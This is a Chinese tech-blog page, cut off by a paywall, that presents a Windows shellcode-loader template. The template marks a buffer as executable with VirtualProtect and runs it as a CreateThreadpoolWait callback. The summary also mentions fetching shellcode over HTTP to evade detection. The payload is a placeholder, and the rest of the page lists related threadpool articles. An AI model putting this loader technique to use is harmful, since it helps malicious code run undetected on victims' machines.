线程池等待对象回调函数执行(CreateThreadpoolWait)

最新推荐文章于 2024-10-25 09:07:13 发布
原创 最新推荐文章于 2024-10-25 09:07:13 发布 · 605 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #c++

文章介绍了如何使用WindowsAPI中的VirtualProtect、CreateEvent和CreateThreadpoolWait等函数,配合shellcode实现内存管理,以及通过HTTP远程加载shellcode以绕过检测的过程。

最初始的模板

#include <stdio.h>
#include <Windows.h>
 
int main() {
   
   
    unsigned char buf[] = "shellcode";
 
    /*
    * VirtualProtect是Windows API,用于修改内存访问权限
    * 参数1:指向内存的指针
    * 参数2:内存大小(以字节为单位)
    * 参数3:新的访问权限
    * 参数4:用于接收修改前的访问权限,NULL表示不需要接受(但是会出错)
    */
    DWORD oldProtect;
    VirtualProtect((LPVOID)buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &oldProtect); // shellcode内存后修改为可读可写可执行
 
    /*
    * CreateEvent是Windows API,用于创建一个事件对象
    * 参数1:安全属性,NULL表示默认
    * 参数2:是否手动复位
    * 参数3:TRUE表示事件对象的初始状态为有信号状态,否则为无信号状态
    * 参数4:事件名称,NULL表示不使用名称
    */
    HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
    /*
    * CreateThreadpoolWait是Windows API,用于创建一个线程池等待对象
    * 参数1:回调函数指针
    * 参数2:回调函数参数
    * 参数3:线程池回调环境
    */
    PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)(LPVOID)buf, NULL, NULL
最低0.47元/天 解锁文章
番茄酱料
关注
C++ windows线程池简介
琅嬛福地
05-15 1108
windows操作系统由C,C++,C#等语言开发,为程序员C++/C#程序员提供了很多底层API, 线程池是windows提供的一大便利编程技术。当然,也可以自己写个线程池。 windows API自带的线程池,主要四种用法,如下图所示: 这种功能都需要一系列的API来完成,以及在项目开发时需要选择性的使用。利用线程池,就不需要用CreateThread创建线程;不需要管理自己线程;Windows封装好的线程池,效率高,性能优越。 ...
win32练习 - CreateThreadpoolWait()
AlickXc的专栏
04-07 1336
#include "stdafx.h" #include #include #include HANDLE Event; PTP_WAIT pWaitItem; VOID CALLBACK WaitCallBack(PTP_CALLBACK_INSTANCE pInstance,PVOID Context,PTP_WAIT Wait,TP_WAIT_RESULT
C#多线程——线程池回调函数
ssharet的博客
04-13 2457
也许你曾经遇到过:一个线程做事情,其他线程等待,那么有可能因为不做事情的线程在等待,而浪费掉时间。 我们可以通过线程池ThreadPool来解决,使用ThreadPool.QueueUserWorkItem(回调函数,object),将参数封装在一个类的对象中,传给回调函数执行。 TheadPool的用法: 1、创建一个ManualResetEvent的对象,就像一个信号灯,指
Windows线程池
milanleon的专栏
07-17 4750
1、Windows提供了一个线程池机制来简化线程的创建、销毁以及日常管理
Winsock控件打造多线程下载软件实战
最新发布
weixin_42583683的博客
10-25 1076
本文还有配套的精品资源,点击获取 简介:该下载软件采用了网络蚂蚁的设计理念,具备多线程下载和断点续传功能,通过Winsock控件实现了与服务器的网络通信。开发者利用Visual Basic编程语言制作了这款软件,并使用全中文注释的源代码来降低初学者的学习门槛。软件的用户界面友好,方便用户执行如暂停、恢复、取消等操作。其核心技术点涉及Winsock控件使用、多线程下载、断点续...
利用 Windows 线程池定制的 4 种方式完成任务(Windows 核心编程)
史D芬周
04-26 868
值得注意的是 WaitForThreadpoolTimerCallbacks 并不具有等待全部的线程池线程操作完成,所以我利用原子操作等待 Statistics 变为 5;SetThreadpoolTimer 的最后一个参数用于将多个计时器分为一组,这个参数用的比较少。来看看使用这个线程池需要哪些函数。
Shellcode执行的回调技术与CreateThreadPoolWait探究
在本节中,我们将探讨如何在C/C++开发中通过回调函数执行Shellcode的概念和实践。首先,需要了解什么是Shellcode。在计算机安全领域,Shellcode通常指的是一段用于利用软件漏洞而执行的代码,它能够提供攻击者对受...
【Windows核心编程笔记】第十一章 线程池的使用
半雨微凉
05-25 1011
线程池开销并不小,所以使用之前先想好你是否真的需要它 以异步方式调用函数 定义函数:VOID NTAPI SimpleCallback(…….) TrySubmitThreadpoolCallback 让线程池中的线程执行该函数 考虑到性能和内存使用,如果大量提交,建议创建工作项一次,分多次提交 CreateThreadpoolWork 创建一个工作项 SubmitThre...
易语言实现高效线程池管理与任务调度
- CreateThreadpoolWait: 创建一个等待对象,可以关联到某个事件,用来控制线程池中线程的执行。 4. 使用易语言线程池的优点: - 易语言的线程池实现了对底层线程操作的封装,简化了多线程编程的复杂度。 - ...
Chapter11-"windows线程池" 之 内核对象触发调用回调函数
iteye_8029的博客
01-26 193
众所周知,一般可以调用WaitForSingleObject、WaitForMultiObject来实现线程同步。但是当多个线程等待同一个内核对象变为触发态时,这并不是一种明智的做法,这样会浪费大量的系统资源。而windows线程池很有效提供系统性能。 利用windows线程池实现,当内核对象变为触发态时,自动调用一个回调函数,一如既往的需要四步 创建对应的回调函数回调函数必须符合...
线程池之工作项,等待项,计时项 (存在疑问???)
零点起步
03-09 695
线程池函数允许我们做: 1.以异步方式调用函数  //工作项 2.每隔一段时间调用一个函数 //计时项 3.在内核对象触发时调用一个函数 //等待项 4.在异步I/O请求完成时调用一个函数 //I/O项 2.每隔一段时间调用一个函数 如果两个:周期的每隔5-7秒执行一段代码,周期的每隔6-8秒执行一段代码。 不用线程池将有两个线程执行,上下文切换不好,如用线程池,系统可能选择6秒间隔
线程池内核对象触发调用函数
qq_39851127的博客
03-22 288
如果想注册一个工作项,等待一个内核对象被触发的时候去执行,与之前说过的步骤很相似,首先编写如下原型的函数: VOID CALLBACK KernelObjCallback( PTP_CALLBACK_INSTANCE pInstance, PVOID pvContext, PTP_WAIT pWait, TP_WAIT_RESULT WaitResult ); pWait是CreateThreadpoolWait函数返回的对象,WaitResult是DWORD的值,可能的值是WAIT_OBJECT_0,WA
《Windows via C/C++》学习笔记 —— Windows 线程池
weixin_30819163的博客
08-25 310
  线程池(thread pool),允许有多个线程同时存在,并发执行,并且这些线程受到统一管理。   在Windows Vista中,提供了全新的线程池机制,一般这些线程池中的线程的创建的销毁是由操作系统自动完成的。   Windows Vista 中重新设计了线程池,提供了一组新的线程池API。因此,本篇讨论的仅仅在Windows Vista系统,或其以上的Windows版本中有效。 ...
《Windows核心编程系列》十一谈谈Windows线程池
系统运维
12-22 652
Windows线程池 上一篇博文我们介绍了IO完成端口。得知IO完成端口可以非常智能的分派线程。但是IO完成端口仅对等待它的线程进行分派,创建和销毁线程的工作仍然需要我们自己来做。 我们自己也可以创建线程,但是涉及到线程的编码操作比较复杂,容易出现差错。为了简化程序员的工作,Windows提供了一个线程池机制来简化线程的创建、销毁以及日常管理。这个新线程池可能不适用于所有的情况,但大...
CreateThreadpoolIo 函数小记
aibulie0537的博客
03-11 677
函数原型如下: PTP_IO WINAPI CreateThreadpoolIo( _In_ HANDLE fl, _In_ PTP_WIN32_IO_CALLBACK pfnio, _Inout_opt_ PVOID pv, _In_opt_ PTP_CALLBACK_ENVIRON pcbe ); ...
线程池之在内核对象触发时调用一个对象
weixin_33932129的博客
06-28 259
步骤:   1、创建一个类似于void CALLBACK WaitCallBack(PTP_CALLBACK_INSTANCE pInstance,PVOID pvContext, PTP_WAIT pcbe,TP_WAIT_RESULT WaitResult)的函数   2、创建一个内核对象   3、CreateThreadpoolWait,创建等待   4、SetThreadpo...
Windows系统线程池+利用windows自带的线程池
老衣的专栏
09-07 2270
come from:http://www.fuzhijie.me/?p=65 一直想弄明白Windows的IO完成端口是什么,这个词语每每出现在我眼前时总是伴随着鲜花和赞美,因此我便将其同许多我从来没搞懂过的东西一起归为神秘一类。这两天一直在看《Windows核心编程》,学到了
线程池(VC_Win32)
u010246665的博客
03-20 747
线程池 (本章节中例子都是用 VS2010 编译调试的) 线程池编写必须在 Windows Vista 操作系统(以及以上版本的操作系统)下,且 C++ 编译器版本至少是 VS2008  线程池的功能 以异步的方式来调用一个函数每隔一段时间调用一个函数当内核对象触发的时候调用一个函数当异步 I/O 请求完成的时候调用一个函数 注意 当一个进程初始化的时候,它
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值